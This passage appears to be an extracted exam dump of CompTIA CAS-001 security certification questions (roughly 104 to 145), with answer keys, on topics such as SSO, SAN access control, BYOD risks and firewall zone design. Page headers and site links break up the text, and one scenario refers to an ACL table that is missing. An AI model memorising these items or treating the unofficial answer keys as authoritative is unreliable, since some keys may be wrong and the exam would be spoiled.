A. 3DES - SHAB. DES - MD5C. Camellia - SHAD. RC4 - MD5

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 104An administrator wants to integrate the Credential Security Support Provider (CredSSP) protocol network level authentication (NLA) into the remote desktopterminal services environment. Which of the following are supported authentication or encryption methods to use while implementing this? (Select THREE).

A. KerberosB. NTLMC. RADIUSD. TACACS+

Real 52CompTIA CAS-001 Exam

E. TLSF. HMACG. Camellia

Correct Answer: ABESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 105A systems security consultant is hired by Corporation X to analyze the current enterprise network environment and make recommendations for increasing networksecurity. It is the consultant's first day on the job. Which of the following network design considerations should the consultant consider? (Select THREE).

Page 54: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. What hardware and software would work best for securing the network?B. What corporate assets need to be protected?C. What are the business needs of the organization?D. What outside threats are most likely to compromise network security?E. What is the budget for this project?F. What time and resources are needed to carry out the security plan?

Correct Answer: BCDSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 106The Chief Executive Officer (CEO) has asked a security project manager to provide recommendations on the breakout of tasks for the development of a newproduct. The CEO thinks that by assigning areas of work appropriately the overall security of the product will be increased, because staff will focus on their areas ofexpertise. Given the below groups and tasks select the BEST list of assignments.

Groups: Networks, Development, Project Management, Security, Systems Engineering, Testing

Tasks: Decomposing requirements, Secure coding standards, Code stability, Functional validation, Stakeholder engagement, Secure transport

A. Systems Engineering. Decomposing requirementsDevelopment: Secure coding standardsTesting. Code stabilityProject Management: Stakeholder engagementReal 53CompTIA CAS-001 ExamSecurity: Secure transportNetworks: Functional validation

B. Systems Engineering. Decomposing requirementsDevelopment: Code stabilityTesting. Functional validationProject Management: Stakeholder engagementSecurity: Secure coding standardsNetworks: Secure transport

C. Systems Engineering. Functional validationDevelopment: Stakeholder engagementTesting. Code stability

Page 55: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Project Management: Decomposing requirementsSecurity: Secure coding standardsNetworks: Secure transport

D. Systems Engineering. Decomposing requirementsDevelopment: Stakeholder engagementTesting. Code stabilityProject Management: Functional validationSecurity: Secure coding standardsNetworks: Secure transport

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 107Which of the following is the MOST secure way to ensure third party applications and introduce only acceptable risk?

A. Line by line code review and simu-lation; uncovers hidden vulnerabilities and allows for behavior to be observed with minimal risk.B. Technical exchange meetings with the application's vendor; vendors have more in depth knowledge of the product.C. Pilot trial; minimizes the impact to the enterprise while still providing services to enterprise users.D. Full deployment with crippled features; allows for large scale testing and observation of the applications security profile.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:answer is modified.

QUESTION 108A software vendor has had several zero-day attacks against its software, due to previously unknown security defects being exploited by attackers. The attackershave been able to perform operations at the same security level as the trusted application. The vendor product management team has decided to re-design theapplication with security as a priority. Which of the following is a design principle that should be used to BEST prevent these types of attacks?

A. Application sandboxingB. Input validation

Page 56: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. Penetration testingD. Code reviews

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 109A new vendor product has been acquired to replace a legacy perimeter security product. There are significant time constraints due to the existing solution nearingend-of-life with no options for extended support. It has been emphasized that only essential activities be performed. Which of the following sequences BESTdescribes the order of activities when balancing security posture and time constraints?

A. Install the new solution, migrate to the new solution, and test the new solution.B. Purchase the new solution, test the new solution, and migrate to the new solution.C. Decommission the old solution, install the new solution, and test the new solution.D. Test the new solution, migrate to the new solution, and decommission the old solution.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 110Within an organization, there is a known lack of governance for solution designs. As a result there are inconsistencies and varying levels of quality for the artifactsthat are produced. Which of the following will help BEST improve this situation?

A. Ensure that those producing solution artifacts are reminded at the next team meeting that quality is important.B. Introduce a peer review process that is mandatory before a document can be officially made Real 55

CompTIA CAS-001 Examfinal.

C. Introduce a peer review and presentation process that includes a review board with representation from relevant disciplines.D. Ensure that appropriate representation from each relevant discipline approves of the solution documents before official approval.

Correct Answer: C

Page 57: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 111During a specific incident response and recovery process action, the response team determines that it must first speak to the person ultimately responsible for thedata. With whom should the response team speak FIRST?

A. Data UserB. Data OwnerC. Business OwnerD. Data Custodian

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 112A growing corporation is responding to the needs of its employees to access corporate email and other resources while traveling. The company is implementingremote access for company laptops. Which of the following security systems should be implemented for remote access? (Select TWO).

A. Virtual Private NetworkB. Secure Sockets Layer for web serversC. Network monitoringD. Multifactor authentication for usersE. Full disk encryptionF. Intrusion detection systems

Correct Answer: ADSection: (none)Explanation

Explanation/Reference:

Page 58: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 113In order to reduce cost and improve employee satisfaction, a large corporation has decided to allow personal communication devices to access email and toremotely connect to the corporate network. Which of the following security measures should the IT organization implement? (Select TWO).

A. A device lockdown according to policiesB. An IDS on the internal networksC. A data disclosure policyD. A privacy policyE. Encrypt data in transit for remote access

Correct Answer: AESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 114A storage administrator would like to make storage available to some hosts and unavailable to other hosts. Which of the following would be used?

A. LUN maskingB. DeduplicationC. MultipathingD. Snapshots

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 115Which of the following is a security advantage of single sign-on? (Select TWO).

A. Users only have to remember one password.B. Applications need to validate authentication tokens.C. Authentication is secured by the certificate authority.

Page 59: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Less time and complexity removing user access.E. All password transactions are encrypted.

Correct Answer: ADSection: (none)Explanation

Explanation/Reference:Real 57CompTIA CAS-001 Exam

Explanation:

QUESTION 116After a system update causes significant downtime, the Chief Information Security Officer (CISO) asks the IT manager who was responsible for the update. The ITmanager responds that it is impossible to know who did the update since five different people have administrative access. How should the IT manager increaseaccountability to prevent this situation from reoccurring? (Select TWO).

A. Implement an enforceable change management system.B. Implement a software development life cycle policy.C. Enable user level auditing on all servers.D. Implement a federated identity management system.E. Configure automatic updates on all servers.

Correct Answer: ACSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 117Company A is purchasing Company B, and will import all of Company B's users into its authentication system. Company A uses 802.1x with a RADIUS server, whileCompany B uses a captive SSL portal with an LDAP backend. Which of the following is the BEST way to integrate these two networks?

A. Enable RADIUS and end point security on Company B's network devices.B. Enable LDAP authentication on Company A's network devices.C. Enable LDAP/TLS authentication on Company A's network devices.D. Enable 802.1x on Company B's network devices.

Page 60: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 118A company has a legacy virtual cluster which was added to the datacenter after a small company was acquired. All VMs on the cluster use the same virtual networkinterface to connect to the

Real 58CompTIA CAS-001 Examcorporate data center LAN. Some of the virtual machines on the cluster process customer data, some process company financial data, and others act as externallyfacing web servers. Which of the following security risks can result from the configuration in this scenario?

A. Visibility on the traffic between the virtual machines can impact confidentialityB. NIC utilization can exceed 50 percent and impact availabilityC. Shared virtual switches can negatively impact the integrity of network packetsD. Additional overhead from network bridging can affect availability

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 119A user on a virtual machine downloads a large file using a popular peer-to-peer torrent program. The user is unable to execute the program on their VM. A securityadministrator scans the VM and detects a virus in the program. The administrator reviews the hypervisor logs and correlates several access attempts to the time ofexecution of the virus. Which of the following is the MOST likely explanation for this behavior?

A. The hypervisor host does not have hardware acceleration enabled and does not allow DEP.B. The virus scanner on the VM changes file extensions of all programs downloaded via P2P to prevent execution.C. The virtual machine is configured to require administrator rights to execute all programs.D. The virus is trying to access a virtual device which the hypervisor is configured to restrict.

Correct Answer: D

Page 61: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 120An administrator is troubleshooting availability issues on a FCoE based storage array that uses deduplication. An administrator has access to the raw data from theSAN and wants to restore the data to different hardware. Which of the following issues may potentially occur?

A. The existing SAN may be read-only.B. The existing SAN used LUN masking.C. The new SAN is not FCoE based.D. The data may not be in a usable format.

Real 59CompTIA CAS-001 Exam

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 121The security administrator has noticed a range of network problems affecting the proxy server. Based on reviewing the logs, the administrator notices that thefirewall is being targeted with various web attacks at the same time that the network problems are occurring. Which of the following strategies would be MOSTeffective in conducting an in-depth assessment and remediation of the problems?

A. 1. Deploy an HTTP interceptor on the switch span port; 2. Adjust the external facing NIDS; 3.Reconfigure the firewall ACLs to block the all traffic above port 2000; 4. Verify the proxy server is configured correctly and hardened; 5. Review the logs weeklyin the future.

B. 1. Deploy a protocol analyzer on the switch span port; 2. Adjust the internal HIDS; 3.Reconfigure the firewall ACLs to block outbound HTTP traffic; 4. Reboot the proxy server; 5.Continue to monitor the network.

C. 1. Deploy a protocol analyzer on the switch span port; 2. Adjust the external facing IPS; 3.Reconfigure the firewall ACLs to block unnecessary ports; 4. Verify the proxy server is configured correctly and hardened; 5. Continue to monitor the network.

D. 1. Deploy a network fuzzer on the switch span port; 2. Adjust the external facing IPS; 3.Reconfigure the proxy server to block the attacks; 4. Verify the firewall is configured correctly and hardened.

Page 62: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 122Company A is merging with Company B. Company B uses mostly hosted services from an outside vendor, while Company A uses mostly in-house products.

The project manager of the merger states the merged systems should meet these goals:

- Ability to customize systems per department- Quick implementation along with an immediate ROI- The internal IT team having administrative level control over all products

The project manager states the in-house services are the best solution. Because of staff shortages, the senior security administrator argues that security will bebest maintained by continuing to use outsourced services.

Real 60CompTIA CAS-001 ExamWhich of the following solutions BEST solves the disagreement?

A. Raise the issue to the Chief Executive Officer (CEO) to escalate the decision to senior management with the recommendation to continue the outsourcing of allIT services.

B. Calculate the time to deploy and support the in-sourced systems accounting for the staff shortage and compare the costs to the ROI costs minus outsourcingcosts. Present the document numbers to management for a final decision.

C. Perform a detailed cost benefit analysis of outsourcing vs. in-sourcing the IT systems and review the system documentation to assess the ROI of in-sourcing.Select COTS products to eliminate development time to meet the ROI goals.

D. Arrange a meeting between the project manager and the senior security administrator to review the requirements and determine how critical all the requirementsare.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 123The new security policy states that only authorized software will be allowed on the corporate network and all personally owned equipment needs to be configured by

Page 63: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

the IT security staff before being allowed on the network. The security administrator creates standard images with all the required software and proper securitycontrols. These images are required to be loaded on all personally owned equipment prior to connecting to the corporate network. These measures ensurecompliance with the new security policy. Which of the following security risks still needs to be addressed in this scenario?

A. An employee copying gigabytes of personal video files from the employee's personal laptop to their company desktop to share files.B. An employee connecting their personal laptop to use a non-company endorsed accounting application that the employee used at a previous company.C. An employee using a corporate FTP application to transfer customer lists and other proprietary files to an external computer and selling them to a competitor.D. An employee accidentally infecting the network with a virus by connecting a USB drive to the employee's personal laptop.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 124The increasing complexity of attacks on corporate networks is a direct result of more and more

Real 61CompTIA CAS-001 Examcorporate employees connecting to corporate networks with mobile and personal devices. In most cases simply banning these connections and devices is notpractical because they support necessary business needs. Which of the following are typical risks and mitigations associated with this new trend?

A. Risks: Data leakage, lost data on destroyed mobile devices, smaller network attack surface, prohibitive telecommunications costsMitigations: Device Encryptions, lock screens, certificate based authentication, corporate telecom plans

B. Risks: Confidentiality leaks through cell conversations, availability of remote corporate data, integrity of data stored on the devicesMitigations: Cellular privacy extensions, mobile VPN clients, over-the-air backups.

C. Risks: Data exfiltration, loss of data via stolen mobile devices, increased data leakage at the network edgeMitigations: Remote data wipe capabilities, implementing corporate security on personally owned devices

D. Risks: Theft of mobile devices, unsanctioned applications, minimal device storage, call quality Mitigations: GPS tracking, centralized approved applicationdeployment, over-the-air backups, QoS implementation

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

Page 64: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 125A security engineer at a major financial institution is prototyping multiple secure network configurations. The testing is focused on understanding the impact eachpotential design will have on the three major security tenants of the network. All designs must take into account the stringent compliance and reporting requirementsfor most worldwide financial institutions. Which of the following is the BEST list of security lifecycle related concerns related to deploying the final design?

A. Decommissioning the existing network smoothly, implementing maintenance and operations procedures for the new network in advance, and ensuringcompliance with applicable regulations and laws.

B. Interoperability with the Security Administration Remote Access protocol, integrity of the data at rest, overall network availability, and compliance with corporateand government regulations and policies.

C. Resistance of the new network design to DDoS attacks, ability to ensure confidentiality of all data in transit, security of change management processes andprocedures, and resilience of the firewalls to power fluctuations.

D. Decommissioning plan for the new network, proper disposal protocols for the existing network equipment, transitioning operations to the new network on dayone, and ensuring compliance with Real 62CompTIA CAS-001 Examcorporate data retention policies.

E. Ensuring smooth transition of maintenance resources to support the new network, updating all whole disk encryption keys to be compatible with IPv6, andmaximizing profits for bank shareholders.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 126The sales staff at a software development company has received the following requirements from a customer: "We need the system to notify us in advance of allsoftware errors and report all outages". Which of the following BEST conveys these customer requirements to the software development team to understand andimplement?

http://www.gratisexam.com/

A. The system shall send a status message to a network monitoring console every five seconds while in an error state and the system should email theadministrator when the number of input errors exceeds five.

Page 65: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. The system shall alert the administrator upon the loss of network communications and when error flags are thrown.C. The system shall email the administrator when processing deviates from expected conditions and the system shall send a heartbeat message to a monitoring

console every second while in normal operations.D. The system shall email the administrator when an error condition is detected and a flag is thrown and the system shall send an email to the administrator when

network communications are disrupted.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 127A programming team is deploying a new PHP module to be run on a Solaris 10 server with trusted extensions. The server is configured with three zones, amanagement zone, a customer zone, and a backend zone. The security model is constructed so that only programs in the management zone can communicatedata between the zones. After installation of the new PHP module, which handles on-line customer payments, it is not functioning correctly. Which of the following isthe MOST likely cause of this problem?

A. The PHP module is written to transfer data from the customer zone to the management zone, and then from the management zone to the backend zone.Real 63CompTIA CAS-001 Exam

B. The iptables configuration is not configured correctly to permit zone to zone communications between the customer and backend zones.C. The PHP module was installed in the management zone, but is trying to call a routine in the customer zone to transfer data directly to a MySQL database in the

backend zone.D. The ipfilters configuration is configured to disallow loopback traffic between the physical NICs associated with each zone.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 128Company XYZ is selling its manufacturing business consisting of one plant to a competitor, Company QRS. All of the people will become QRS employees, but willretain permissions to plant- specific information and resources for one month. To ease the transition, Company QRS also connected the plant and employees to theCompany QRS network. Which of the following threats is the HIGHEST risk to Company XYZ?

A. Malware originating from Company XYZ's network

Page 66: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. Co-mingling of company networksC. Lack of an IPSec connection between the two networksD. Loss of proprietary plant information

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 129Company ABC has grown yearly through mergers and acquisitions. This has led to over 200 internal custom web applications having standalone identity stores. Inorder to reduce costs and improve operational efficiencies a project has been initiated to implement a centralized security infrastructure.

The requirements are as follows:

- Reduce costs- Improve efficiencies and time to market- Manageable- Accurate identity information- Standardize on authentication and authorization- Ensure a reusable model with standard integration patterns

Real 64CompTIA CAS-001 ExamWhich of the following security solution options will BEST meet the above requirements? (Select THREE).

A. Build an organization-wide fine grained access control model stored in a centralized policy data store.B. Implement self service provisioning of identity information, coarse grained, and fine grained access control.C. Implement a web access control agent based model with a centralized directory model providing coarse grained access control and single sign-on capabilities.D. Implement a web access controlled reverse proxy and centralized directory model providing coarse grained access control and single sign-on capabilities.E. Implement automated provisioning of identity information; coarse grained, and fine grained access control.F. Move each of the applications individual fine grained access control models into a centralized directory with fine grained access control.G. Implement a web access control forward proxy and centralized directory model, providing coarse grained access control, and single sign-on capabilities.

Correct Answer: ADESection: (none)Explanation

Page 67: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 130A bank has just outsourced the security department to a consulting firm, but retained the security architecture group. A few months into the contract the bankdiscovers that the consulting firm has sub-contracted some of the security functions to another provider. Management is pressuring the sourcing manager to ensureadequate protections are in place to insulate the bank from legal and service exposures. Which of the following is the MOST appropriate action to take?

A. Directly establish another separate service contract with the sub-contractor to limit the risk exposure and legal implications.B. Ensure the consulting firm has service agreements with the sub-contractor; if the agreement does not exist, exit the contract when possible.C. Log it as a risk in the business risk register and pass the risk to the consulting firm for acceptance and responsibility.D. Terminate the contract immediately and bring the security department in-house again to reduce legal and regulatory exposure.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:answer is verified.

QUESTION 131Company XYZ has invested an increasing amount in security due to the changing threat landscape. The company is going through a cost cutting exercise and theChief Financial Officer (CFO) has queried the security budget allocated to the Chief Information Security Officer (CISO). At the same time, the CISO is activelypromoting business cases for additional funding to support new initiatives. These initiatives will mitigate several security incidents that have occurred due toineffective controls.

A security advisor is engaged to assess the current controls framework and to provide recommendations on whether preventative, detective, or corrective controlsshould be implemented. How should the security advisor respond when explaining which controls to implement?

A. Preventative controls are useful before an event occurs, detective controls are useful during an event, and corrective controls are useful after an event hasoccurred. A combination of controls can be used.

B. Corrective controls are more costly to implement, but are only needed for real attacks or high value assets; therefore, controls should only be put in place after areal attack has occurred.

C. Detective controls are less costly to implement than preventative controls; therefore, they should be encouraged wherever possible. Corrective controls are usedduring an event or security incident. Preventative controls are hard to achieve in practice due to current market offerings.

D. Always advise the use of preventative controls as this will prevent security incidents from occurring in the first place. Detective and corrective controls areredundant compensating controls and are not required if preventative controls are implemented.

Correct Answer: A

Page 68: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 132There has been a recent security breach which has led to the release of sensitive customer information. As part of improving security and reducing the disclosure ofcustomer data, a training company has been employed to educate staff. Which of the following should be the primary focus of the privacy compliance trainingprogram?

A. Explain how customer data is gathered, used, disclosed, and managed.B. Remind staff of the company's data handling policy and have staff sign an NDA.C. Focus on explaining the "how" and "why" customer data is being collected.D. Republish the data classification and the confidentiality policy.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

Real 66CompTIA CAS-001 Exam

QUESTION 133A new malware spreads over UDP Port 8320 and several network hosts have been infected. A new security administrator has determined a possible cause, and theinfected machines have been quarantined. Which of the following actions could a new security administrator take to further mitigate this issue?

A. Limit source ports on the firewall to specific IP addresses.B. Add an explicit deny-all and log rule as the final entry of the firewall rulebase.C. Implement stateful UDP filtering on UDP ports above 1024.D. Configure the firewall to use IPv6 by default.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:

Page 69: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation:

QUESTION 134A newly-hired Chief Information Security Officer (CISO) is faced with improving security for a company with low morale and numerous disgruntled employees. Afterreviewing the situation for several weeks the CISO publishes a more comprehensive security policy with associated standards. Which of the following issues couldbe addressed through the use of technical controls specified in the new security policy?

A. Employees publishing negative information and stories about company management on social network sites and blogs.B. An employee remotely configuring the email server at a relative's company during work hours.C. Employees posting negative comments about the company from personal phones and PDAs.D. External parties cloning some of the company's externally facing web pages and creating look- alike sites.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 135A small company has recently placed a newly installed DNS server on the DMZ and wants to secure it by allowing Internet hosts to query the DNS server. Since thecompany deploys an internal DNS server, all DNS queries to that server coming from the company network should be

Real 67CompTIA CAS-001 Examblocked. An IT administrator has placed the following ACL on the company firewall:

Testing shows that the DNS server in the DMZ is not working. Which of the following should the administrator do to resolve the problem?

A. Modify the SRC and DST ports of ACL 1B. Modify the SRC IP of ACL 1 to 0.0.0.0/32C. Modify the ACTION of ACL 2 to PermitD. Modify the PROTO of ACL 1 to TCP

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

Page 70: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 136An administrator would like to connect a server to a SAN. Which of the following processes would BEST allow for availability and access control?

A. Install a dual port HBA on the SAN, create a LUN on the server, and enable deduplication and data snapshots.B. Install a multipath LUN on the server with deduplication, and enable LUN masking on the SAN.C. Install 2 LUNs on the server, cluster HBAs on the SAN, and enable multipath and data deduplication.D. Install a dual port HBA in the server; create a LUN on the SAN, and enable LUN masking and multipath.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 137A company data center provides Internet based access to email and web services.

The firewall is separated into four zones:

- RED ZONE is an Internet zone- ORANGE ZONE a Web DMZ- YELLOW ZONE an email DMZ- GREEN ZONE is a management interface

Real 68CompTIA CAS-001 ExamThere are 15 email servers and 10 web servers. The data center administrator plugs a laptop into the management interface to make firewall changes. Theadministrator would like to secure this environment but has a limited budget. Assuming each addition is an appliance, which of the following would provide theMOST appropriate placement of security solutions while minimizing the expenses?

A. RED ZONE: noneORANGE ZONE: WAFYELLOW ZONE: SPAM FilterGREEN ZONE: none

B. RED ZONE: Virus Scanner, SPAM FilterORANGE ZONE: NIPSYELLOW ZONE: NIPSGREEN ZONE: NIPS

Page 71: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. RED ZONE: WAF, Virus ScannerORANGE ZONE: NIPSYELLOW ZONE: NIPSGREEN ZONE: SPAM Filter

D. RED ZONE: NIPSORANGE ZONE: WAFYELLOW ZONE: Virus Scanner, SPAM FilterGREEN ZONE: none

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 138An administrator implements a new PHP application into an existing website and discovers the newly added PHP pages do not work. The rest of the site also usesPHP and is functioning correctly. The administrator tested the new application on their personal workstation thoroughly before uploading to the server and did notrun into any errors. Checking the Apache configuration file, the administrator verifies that the new virtual directory is added as listed:

<VirtualHost *:80>

DocumentRoot "/var/www"

<Directory "/home/administrator/app">

AllowOveride none

Order allow, deny

Allow from all

Real 69CompTIA CAS-001 Exam</Directory>

</VirtualHost>

Which of the following is MOST likely occurring so that this application does not run properly?

Page 72: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. PHP is overriding the Apache security settings.B. SELinux is preventing HTTP access to home directories.C. PHP has not been restarted since the additions were added.D. The directory had an explicit allow statement rather than the implicit deny.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 139Company GHI consolidated their network distribution so twelve network VLANs would be available over dual fiber links to a modular L2 switch in each of thecompany's six IDFs. The IDF modular switches have redundant switch fabrics and power supplies. Which of the following threats will have the GREATEST impacton the network and what is the appropriate remediation step?

A. Threat: 802.1q trunking attackRemediation: Enable only necessary VLANs for each port

B. Threat: Bridge loopRemediation: Enable spanning tree

C. Threat: VLAN hoppingRemediation: Enable only necessary VLANs for each port

D. Threat: VLAN hoppingRemediation: Enable ACLs on the IDF switch

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 140After a recent outbreak of malware attacks, the Chief Information Officer (CIO) tasks the new security manager with determining how to keep these attacks fromreoccurring. The company has a standard image for all laptops/workstations and uses a host-based firewall and anti-virus. Which of the following should thesecurity manager suggest to INCREASE each system's security level?

Real 70CompTIA CAS-001 Exam

Page 73: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Upgrade all system's to use a HIPS and require daily anti-virus scans.B. Conduct a vulnerability assessment of the standard image and remediate findings.C. Upgrade the existing NIDS to NIPS and deploy the system across all network segments.D. Rebuild the standard image and require daily anti-virus scans of all PCs and laptops.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 141The Chief Information Officer (CIO) of Company XYZ has returned from a large IT conference where one of the topics was defending against zero day attacks -specifically deploying third party patches to vulnerable software. Two months prior, the majority of the company systems were compromised because of a zero dayexploit. Due to budget constraints the company only has operational systems. The CIO wants the Security Manager to research the use of these patches. Which ofthe following is the GREATEST concern with the use of a third party patch to mitigate another un-patched vulnerability?

A. The company does not have an adequate test environment to validate the impact of the third party patch, introducing unknown risks.B. The third party patch may introduce additional unforeseen risks and void the software licenses for the patched applications.C. The company's patch management solution only supports patches and updates released directly by the vendor.D. Another period of vulnerability will be introduced because of the need to remove the third party patch prior to installing any vendor patch.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 142When planning a complex system architecture, it is important to build in mechanisms to secure log information, facilitate audit log reduction, and event correlation.Besides synchronizing system time across all devices through NTP, which of the following is also a common design consideration for remote locations?

A. Two factor authentication for all incident respondersB. A central SYSLOG server for collecting all logsC. A distributed SIEM with centralized sensorsD. A SIEM server with distributed sensors

Page 74: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Real 71CompTIA CAS-001 Exam

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 143Which of the following implementations of a continuous monitoring risk mitigation strategy is correct?

A. Audit successful and failed events, transfer logs to a centralized server, institute computer assisted audit reduction, and email alerts to NOC staff hourly.B. Audit successful and critical failed events, transfer logs to a centralized server once a month, tailor logged event thresholds to meet organization goals, and

display alerts in real time when thresholds are approached.C. Audit successful and failed events, transfer logs to a centralized server, institute computer assisted audit reduction, tailor logged event thresholds to meet

organization goals, and display alerts in real time when thresholds are exceeded.D. Audit failed events only, transfer logs to a centralized server, implement manual audit reduction, tailor logged event thresholds to meet organization goals, and

display alerts in real time when thresholds are approached and exceeded.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 144A corporation relies on a server running a trusted operating system to broker data transactions between different security zones on their network. Each zone is aseparate domain and the only connection between the networks is via the trusted server.

The three zones at the corporation are as followeD.

- Zone A connects to a network, which is also connected to the Internet through a router.- Zone B to a closed research and development network.- Zone C to an intermediary switch supporting a SAN, dedicated to long-term audit log and file storage, so the corporation meets compliance requirements.

A firewall is deployed on the inside edge of the Internet connected router.

Which of the following is the BEST location to place other security equipment?

Page 75: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Real 72CompTIA CAS-001 Exam

A. HIPS on all hosts in Zone A and B, and an antivirus and patch server in Zone C.B. A WAF on the switch in Zone C, an additional firewall in Zone A, and an antivirus server in Zone B.C. A NIPS on the switch in Zone C, an antivirus server in Zone A, and a patch server in Zone B.D. A NIDS on the switch in Zone C, a WAF in Zone A, and a firewall in Zone B.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 145A system architect has the following constraints from the customer:

- Confidentiality, Integrity, and Availability (CIA) are all of equal importance.- Average availability must be at least 6 nines (99.9999%).- All devices must support collaboration with every other user device.- All devices must be VoIP and teleconference ready.

Which of the following security controls is the BEST to apply to this architecture?

